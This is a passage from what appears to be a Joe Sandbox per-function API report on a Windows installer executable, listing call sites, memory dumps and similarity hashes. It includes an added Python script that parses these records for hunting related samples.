• CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
Strings
• C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 0040226E
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
• API String ID: 542301482-455884830
• Opcode ID: c5d79d16062643fa9f49ccf2f1417c0b8ed88cb680971ee357d323a85270418a
• Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
• Opcode Fuzzy Hash: c5d79d16062643fa9f49ccf2f1417c0b8ed88cb680971ee357d323a85270418a
• Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 30b04623f1bfc97e613d6b745aa06119eef436eb88c3a4778c562d35565e2df1
• Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
• Opcode Fuzzy Hash: 30b04623f1bfc97e613d6b745aa06119eef436eb88c3a4778c562d35565e2df1
• Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                                                                                                                          • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                                                                                                                            • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405347
                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405503
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
• Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
• Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
• Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
• Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
Uniqueness
Uniqueness Score: -1.00%
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
• GetDlgItem.USER32(?,000003E8), ref: 00404711
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
• GetSysColor.USER32(?), ref: 0040473F
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
• lstrlenW.KERNEL32(?), ref: 00404760
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
• GetDlgItem.USER32(?,0000040A), ref: 004047DB
• SendMessageW.USER32(00000000), ref: 004047E2
• GetDlgItem.USER32(?,000003E8), ref: 0040480D
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
• LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
• SetCursor.USER32(00000000), ref: 00404861
• LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
• SetCursor.USER32(00000000), ref: 0040487D
• SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
• SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: : Completed$N$fh
• API String ID: 3103080414-3646902880
• Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
• Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
• Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
• Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
Uniqueness
Uniqueness Score: -1.00%
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
• Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
• Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
• Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
Uniqueness
Uniqueness Score: -1.00%
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
• GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
  • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
  • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
• GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
• wsprintfA.USER32 ref: 004061E6
• GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
• SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
• GlobalFree.KERNEL32(00000000), ref: 004062CF
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
  • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
  • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                                          • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                                                          • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404524
• GetSysColor.USER32(00000000), ref: 00404562
• SetTextColor.GDI32(?,00000000), ref: 0040456E
• SetBkMode.GDI32(?,?), ref: 0040457A
• GetSysColor.USER32(?), ref: 0040458D
• SetBkColor.GDI32(?,?), ref: 0040459D
• DeleteObject.GDI32(?), ref: 004045B7
• CreateBrushIndirect.GDI32(?), ref: 004045C1
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same ten associated memory dumps as in the first record above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
• Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
  • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same ten associated memory dumps as in the first record above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
• Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
• Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
• Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
• CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
• CharNextW.USER32(?,00434000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
• CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same ten associated memory dumps as in the first record above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-4010320282
• Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
• Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
• Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
• Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
Uniqueness
• Uniqueness Score: -1.00%
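
Every function record above has the same shape: an APIs list of `Name.MODULE(args), ref: ADDR` call sites, then a Similarity group whose API ID and fuzzy hashes are what an analyst searches other reports for. The script below is an added example, not code from the Joe Sandbox report or its tooling. It assumes only the plain-text layout shown here; the names `ApiCall`, `FunctionRecord`, `parse_report`, `modules_used` and `pivot_key` are this example's own, and the `SAMPLE` text inside it is trimmed from three of the records on this page.

```python
"""Turn Joe Sandbox per-function API summaries into structured records.

Added example, not part of the Joe Sandbox report or its tooling. It assumes
the plain-text layout seen above: an "APIs" header opening each function
record, bullet lines shaped "Name.MODULE(args), ref: ADDR" (a "Part of subcall
function ADDR:" prefix marks calls reached one level down), and a "Similarity"
group holding "API ID", "String ID", "API String ID", the two IDs and the two
fuzzy hashes. Every other line on the page is skipped.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subaddr>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"   # comma absent when there are no args
)
_FIELD_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]*?): ?(?P<value>.*)$")
_KEEP_FIELDS = {
    "API ID", "String ID", "API String ID", "Opcode ID", "Instruction ID",
    "Opcode Fuzzy Hash", "Instruction Fuzzy Hash",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                     # call-site address inside the dumped image
    via_subcall: Optional[int]   # callee address when the call sits one level down


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    def api_names(self) -> List[str]:
        return [c.name for c in self.apis]

    def calls_from(self, module: str) -> List[ApiCall]:
        return [c for c in self.apis if c.module.upper() == module.upper()]

    def pivot_key(self) -> str:
        """API ID plus instruction fuzzy hash: the pair to search other reports
        for when hunting variants of the same function."""
        return f'{self.fields.get("API ID", "")}|{self.fields.get("Instruction Fuzzy Hash", "")}'


def parse_report(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop indentation and bullet glyphs
        if not line:
            continue
        if line == "APIs":                       # each function record opens with its API list
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = _API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []   # report strings are unquoted
            current.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                        int(m["subaddr"], 16) if m["subaddr"] else None))
            continue
        m = _FIELD_RE.match(line)
        if m and m["key"] in _KEEP_FIELDS:
            current.fields[m["key"]] = m["value"].strip()
    return records


def modules_used(records: List[FunctionRecord]) -> Dict[str, List[str]]:
    """Module -> sorted, de-duplicated API names across all parsed records."""
    seen = defaultdict(set)
    for rec in records:
        for c in rec.apis:
            seen[c.module.upper()].add(c.name)
    return {mod: sorted(names) for mod, names in seen.items()}


# Trimmed fragments of three records from the report above.
SAMPLE = """
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
  • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404524
• GetSysColor.USER32(00000000), ref: 00404562
• SetTextColor.GDI32(?,00000000), ref: 0040456E
Similarity
• String ID:
• API String ID: 2320649405-0
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
• GetMessagePos.USER32 ref: 00404E7E
• ScreenToClient.USER32(?,?), ref: 00404E98
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.api_names(), rec.pivot_key())
    print(modules_used(parse_report(SAMPLE)))
```

Feed it the whole report text rather than the trimmed sample and `modules_used` gives a quick view of which DLLs the dumped image touches, while `pivot_key` per record is what to paste into a search across other reports when checking whether a function body recurs in related samples.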

APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
• GetMessagePos.USER32 ref: 00404E7E
• ScreenToClient.USER32(?,?), ref: 00404E98
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same ten associated memory dumps as in the first record above
Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                          • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
• MulDiv.KERNEL32(00009E00,00000064,000B7868), ref: 00402FE1
• wsprintfW.USER32 ref: 00402FF1
• SetWindowTextW.USER32(?,?), ref: 00403001
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
Strings
• verifying installer: %d%%, xrefs: 00402FEB
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
• Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
• Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
• Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
• GlobalFree.KERNEL32(?), ref: 00402A0B
• GlobalFree.KERNEL32(00000000), ref: 00402A1E
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
